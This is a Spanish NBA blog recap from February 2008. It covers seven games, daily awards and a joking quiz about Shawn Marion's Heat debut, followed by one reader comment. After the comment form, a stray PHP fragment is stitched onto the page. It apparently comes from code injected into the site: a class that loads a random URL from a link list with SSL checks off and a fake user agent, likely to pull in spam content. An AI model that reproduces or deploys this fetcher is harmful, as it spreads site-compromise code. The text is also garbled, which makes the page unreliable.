La crónica (10/01/08)

11 de February de 2008 por MagicJohnson32

paucrowdmiamiLa tarde-noche del domingo nos dejó siete partidos, varios de ellos muy interesantes, empezando por el que abrió fuego, el Celtics-Spurs. Paul Pierce lideró con 35 puntos el triunfo de su equipo sobre los texanos, en los que Duncan fue el mejor con 22 puntos, 14 rebotes y 6 asistencias. Sin embargo, Glen Davis y Powe hicieron un buen trabajo defensivo para suplir las ausencias de Garnett y Perkins y los Celtics sumaron otra victoria en un final más igualado de lo que señala el 90-98 definitivo. En Miami, los Lakers sumaron un nuevo triunfo y los Heat, una nueva derrota pese al buen debut de Shawn Marion (15 puntos y 14 rebotes) en la derrota 104-94 frente a los angelinos. Los 33 puntos con 10 de 15 en tiros de Kobe Bryant y los 15 puntos, 18 rebotes y 6 asistencias de Odom fueron suficientes para Lakers en un flojo partido de Gasol, que se quedó en 12 puntos y vio como Blount le hacía 22.

Sorprendente, por su contundencia, resultó la derrota de los Mavericks en New Jersey, 82-101, un encuentro en el que la defensa local desactivó los recursos ofensivos de los visitantes, especialmente en un parcial de 0-21. Dallas se quedó en un 36% en tiros, con 4 de 16 de Nowitzki y 7 de 18 de Josh Howard. Vince Carter destacó con 29 puntos y Kidd repartió 14 asistencias ante el que puede ser su próximo destino y en lo que supone la cuarta victoria en 16 partidos para los Nets. El equipo más en forma ahora mismo de la liga son los Pistons, que ya suman ocho triunfos consecutivos después de su victoria, 87-113, sobre los Bobcats. Jason Richardson se salvó de la quema por los de Charlotte mientras que Prince logró 21 puntos, 6 rebotes y 3 asistencias para ser el más destacado dentro de la solidez habitual de los de Detroit.

lebronmelocavsnuggetsEn Minneapolis se vio una nueva exhibición de Calderón, impecable en el triunfo 105-82 de los Raptors sobre los Wolves. El base extremeño anotó todos sus lanzamientos (2/2 en tiros de 2, 2/2 en triples y 5/5 en libres) y repartió 10 asistencias en apenas 25 minutos de juego, más que suficiente para superar al conjunto local, en el que Jefferson firmó 18 puntos y 9 rebotes. En Cleveland, Carmelo Anthony amplió su buena racha ante LeBron James; ambos brillaron en lo individual pero los Nuggets pasaron por encima (113-83) de los Cavs, que presentaban las bajas de Gooden y Pavlovic. Iverson y Camby acompañaron a Melo, mientras que James apenas contó con colaboración de sus compañeros y el partido estaba sentenciado en el tercer cuarto. Por último, los Wizards llevaron hasta 7 su racha de derrotas, aunque sin Arenas ni Butler ni Daniels ya hicieron bastante con dar la cara en Phoenix, en un partido resuelto por la mínima, 107-108, gracias a Amare Stoudemire, autor de 31 puntos, 13 rebotes y 4 tapones. Jamison y Haywood fueron los mejores por parte de los capitalinos.

Tras el resumen de los encuentros, seguimos con los premios.amareblocksblatche

Nuestro MVP: Es su segundo partido consecutivo con más de 30 puntos y 10 rebotes. Amare Stoudemire fue el mejor de los Suns en el triunfo sobre los Wizards al anotar 10 de 17 en tiros de campo, 10 de 10 en libres, y completar su actuación con 13 rebotes y 4 tapones. Otros destacados del día fueron la pareja de Denver, Iverson & Melo, la de los Lakers, Kobe & Odom, así como Paul Pierce.

El rookie: 5 de 7 en tiros, 13 puntos, 6 asistencias en apenas 24 minutos. Rodney Stuckey continúa demostrando que puede tener minutos de calidad en los Pistons y poco a poco va ganando terreno en la rotación de Flip Saunders.

La sorpresa: No tanto por sus estadísticas como por su trabajo sobre Duncan, decisivo en el triunfo de los Celtics ante los Spurs. Doc Rivers se vio obligado a recurrir a Glen Davis y éste le respondió con 9 puntos, 8 rebotes y una gran intensidad para frenar a Duncan en la segunda mitad.

La decepción: generalmente cumple como revulsivo pero anoche Barbosa apenas hizo nada bien para los Suns. Falló 10 de sus 12 tiros, se quedó en 5 puntos y 4 asistencias. Pese al brasileño, los Suns vencieron.

Pasatiempos: ¿Qué le decía Wade a Marion, anoche en el debut de The Matrix como jugador de los Heat?

wademariondebutA) “¿Estabas con Nash y Amare, y te vienes con Jason Williams y Blount? ¿En qué leches pensabas?”

B) “¿Te arrepientes ya, o todavía no?”

C) “Jo, macho, ni te imaginas qué peso nos hemos quitado de encima”

D) “Yo no es que sea Reggie Miller, pero lo de tu mecánica de tiro es para hacérselo mirar, eh”

Respuesta correcta: Wade tiene que estar contento porque el panorama de Miami se aclara y porque la intensidad de Marion vendrá bien en un equipo derrotado como estos Heat. Desde la perspectiva de Marion es más difícil comprender sus motivos para pedir el traspaso. Que vaya acostumbrándose a perder partidos, al menos esta temporada. Nos decantamos, por tanto, por la B, e imaginamos que sí, Marion acabará arrepintiéndose. El premio para el ganador son las cajas de donuts que dejó abandonadas O’Neal en su taquilla del vestuario de los Heat. Cosas de las prisas…

Comenta

Un comentario a esta entrada

  1. xapa_croack dice:
    #1

    Con la vuelta de TJ, Calderon vera bajado sus minutos en cancha considerablemente, veremos como queda la cosa.

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>